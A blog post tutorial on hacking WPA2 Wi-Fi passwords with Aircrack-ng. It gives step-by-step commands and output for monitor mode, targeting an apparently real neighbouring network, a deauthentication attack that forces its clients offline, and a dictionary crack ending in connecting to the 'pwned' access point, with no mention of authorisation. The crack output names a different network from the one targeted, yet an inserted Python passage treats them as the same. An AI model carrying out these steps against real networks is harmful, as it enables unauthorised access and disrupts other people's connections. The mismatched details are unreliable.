How to Hack Wi-Fi Password using Aircrack-ng

Lovelesh Gangil
6 min read · Feb 28, 2021


Hello everyone. This is another blog post in which we will discuss how to capture and crack a Wi-Fi password using Aircrack-ng.

We are using the Aircrack-ng suite because it is open source, very versatile and available for all major operating systems.

Wireless networks are widely used and quite easy to set up. They follow the IEEE 802.11 standards. A wireless network is reachable by anyone within the router's transmission radius, which makes it exposed to attack from anyone in range. Hotspots are also common in public places such as airports, restaurants and parks.

WEP and WPA are the two main security protocols used in Wi-Fi LANs. WEP stands for Wired Equivalent Privacy. It is a deprecated protocol that was introduced back in 1997 as part of the original 802.11 standard. It was weak, several serious weaknesses were found in it, and today it can be cracked within minutes. So a new security protocol, Wi-Fi Protected Access (WPA), was introduced in 2003. It has two main versions, WPA and WPA2, and WPA2 is the current security protocol used in wireless networks.

Aircrack-NG

Aircrack-ng is a software suite that helps you attack and defend wireless networks. It is not a single tool but a collection of tools, each of which performs a specific function: a network detector, a packet sniffer, a WEP/WPA cracker, and so on.

Before we look at Aircrack in detail, here are a few terms you should know.

  • Access Point — The wireless device (usually the router) that broadcasts the Wi-Fi network you want to connect to.
  • SSID — The name of the network advertised by the access point, e.g. “Starbucks”.
  • BSSID — The MAC address of the access point's wireless interface.
  • Pcap file — Packet capture file. Contains the packets captured from a network.
  • Monitor mode — An adapter mode that captures 802.11 frames from the air without connecting to a router or access point.

Before starting we need to ensure that our Wi-Fi adapter is in monitor mode. We can check its current mode with the command:

$ iwconfig
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=16 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

If it is not in monitor mode (Mode:Managed above), type the command:

$ airmon-ng start wlan0

  PID Name
  667 NetworkManager
 1198 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

This switches the wireless adapter into monitor mode and creates a new interface, wlan0mon, that we use from now on. Once monitor mode is enabled you can capture network packets. Next we move on to capturing packets with the suite's next tool, airodump-ng.

Airodump-ng is a packet capture utility that captures and saves raw 802.11 frames for further analysis. We will use airodump-ng with different switches for different purposes. First we list all access points in range:

$ airodump-ng --manufacturer wlan0mon

 CH  4 ][ Elapsed: 30 s ][ 2021-02-27 15:47

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID           MANUFACTURER

 18:82:8C:EC:2C:20  -34       56        0    0   1  130   WPA2 CCMP   PSK  JioFiber-Kie6e  Unknown
 04:95:E6:74:34:30  -85       35        0    0  10  270   WPA2 CCMP   PSK  Tenda_743430    Tenda Technology Co.,Ltd.Dongguan branch
 00:24:82:A6:5F:78  -83        2        0    0   2   54e. WPA2 CCMP   PSK  <length:  0>    Ruckus Wireless
 28:3B:82:65:9C:0B  -89        7        0    0   8  270   WPA2 CCMP   PSK  Darkunde        D-Link International
 AC:37:28:61:A4:89  -93       19        1    0   9  130   WPA2 CCMP   PSK  Home 95         Unknown
 50:2B:73:1D:B8:50  -93       15        0    0   3  270   WPA2 CCMP   PSK  Sahuji          Tenda Technology Co.,Ltd.Dongguan branch

Choose the access point you wish to connect to. Let's take the JioFiber-Kie6e access point (BSSID 18:82:8C:EC:2C:20 on channel 1). For this we need to capture that access point's packets along with its WPA handshake:

$ airodump-ng --channel 1 --bssid 18:82:8C:EC:2C:20 --write packets wlan0mon

In this command, --channel and --bssid restrict the capture to our target, and the --write switch saves the captured packets to files with the prefix packets (the first capture file is packets-01.cap). The last argument is the name of our monitor-mode interface.

Once a device connects to this access point we will capture the WPA handshake. If no handshake arrives but you can see devices already connected to that access point, a de-authentication attack forces those devices to disconnect and reconnect, and the reconnection gives us the WPA handshake. For this we use the next part of the suite, aireplay-ng:

$ aireplay-ng --deauth 0 -a 18:82:8C:EC:2C:20 wlan0mon

After some time stop this command; meanwhile, airodump-ng in the other terminal will report that it has captured the WPA handshake.

After capturing the WPA handshake we crack the password from it using the next part of the suite, aircrack-ng.

For password cracking with aircrack-ng we need a wordlist to test candidate passwords against the handshake. We can use the default wordlist pre-installed in Kali Linux, rockyou.txt:

$ aircrack-ng packets-01.cap -w /usr/share/wordlists/rockyou.txt
Reading packets, please wait...
Opening packets-01.cap
Read 2418 packets.

   #  BSSID              ESSID                     Encryption

   1  DE:1A:C5:E6:56:B7  vivo 1609                 WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening packets-01.cap
Read 2418 packets.

1 potential targets

                               Aircrack-ng 1.6

      [00:00:01] 105/10303732 keys tested (176.21 k/s)

      Time left: 16 hours, 14 minutes, 33 seconds                 0.00%

                           KEY FOUND! [ 123456789 ]

      Master Key     : F0 CA 88 D0 38 B4 D0 64 2F C4 35 DB 5D CD 5A 6D
                       93 0B 07 29 13 57 0D 77 B7 B4 CF 3A AD 30 AA FF

      Transient Key  : D8 05 40 9F 07 64 5C C1 26 F2 2B A9 3E BB DD 71
                       9E B5 88 74 6A 41 7F AA 0A AE 76 1A 66 7F 53 15
                       13 44 AC 09 A3 0F 0D EA 37 CC 10 A2 9F 94 05 21
                       BD 71 98 F3 4F BF 69 29 EB 33 F6 CD 11 C8 AA 50

      EAPOL HMAC     : 92 34 96 78 2E 0C 44 9B 49 B9 CA 44 7E 8F 99 C0

So here is the cracked key: the password is 123456789. In this way you can recover any WPA/WPA2-PSK password with this method, but only if the passphrase actually appears in your wordlist; otherwise you will need another wordlist or a custom one.
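The “Master Key” in the output above is the WPA2 Pairwise Master Key: PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256-bit output. Every candidate from the wordlist has to go through that derivation, which is why the status line reports only a few hundred keys per second (aircrack-ng's “k/s” means keys per second) and why the passphrase must be in the list at all. The following is an added Python example, not code from the post or from the Aircrack-ng project; it derives the PMK for the SSID and passphrase shown in the post (assumed here to belong together) and reproduces the post's “Time left” figure from its counter and rate.

```python
import hashlib

# Constructed sample: the SSID from the post's airodump-ng listing and the
# passphrase aircrack-ng reported as KEY FOUND (assumed to belong together).
SSID = "JioFiber-Kie6e"
PASSPHRASE = "123456789"


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA2-PSK Pairwise Master Key (what aircrack-ng prints as
    'Master Key'): PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def format_master_key(pmk: bytes) -> str:
    """Render a PMK the way aircrack-ng does: two rows of 16 hex bytes."""
    hexbytes = [f"{b:02X}" for b in pmk]
    return "\n".join(" ".join(hexbytes[i:i + 16]) for i in range(0, 32, 16))


def time_left(total_keys: int, tested: int, keys_per_sec: float):
    """Reproduce aircrack-ng's 'Time left' line as (hours, minutes, seconds).
    The rate is keys per second, so a ~10M-entry list takes hours at 176 k/s."""
    seconds = int((total_keys - tested) / keys_per_sec)
    return seconds // 3600, (seconds % 3600) // 60, seconds % 60


def in_wordlist(passphrase: str, wordlist) -> bool:
    """A dictionary attack can only succeed if the passphrase is in the list;
    the same check is a cheap defender's test of a candidate passphrase."""
    return any(line.rstrip("\r\n") == passphrase for line in wordlist)


if __name__ == "__main__":
    print(format_master_key(wpa2_pmk(PASSPHRASE, SSID)))
    print("Time left: %d hours, %d minutes, %d seconds" % time_left(10303732, 105, 176.21))
    # Constructed three-entry list standing in for rockyou.txt
    print(in_wordlist(PASSPHRASE, ["password\n", "123456789\n", "qwerty\n"]))
```

A passphrase that in_wordlist() finds in rockyou.txt is one this attack recovers within hours; a long passphrase that is not in any public list is the mitigation the post's own “make sure the key matches a word in your wordlist” remark points at.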

Wait… before leaving and connecting to the pwned access point, don't forget to switch your wireless adapter back from monitor mode to managed mode:

$ airmon-ng stop wlan0mon

I recommend using the rockyou.txt wordlist or a custom wordlist, but if you want to use a larger, more complex wordlist, here is the link you can use:

You can also use other, automated tools for Wi-Fi password cracking such as WEPCrack, Wifite, Fern Wifi Cracker and MDK3. But I recommend this manual method, which is easy to understand and lets you do every step by hand.

For any queries, contact me on my Twitter and LinkedIn profiles:



Lovelesh Gangil

Offensive Security | Digital Forensics and Incident Response (DFIR) | CEH (Practical) | ISMS ISO 27001:2022 | CAP | CNSP | GPCSSI '21 | ICSI (CNSS)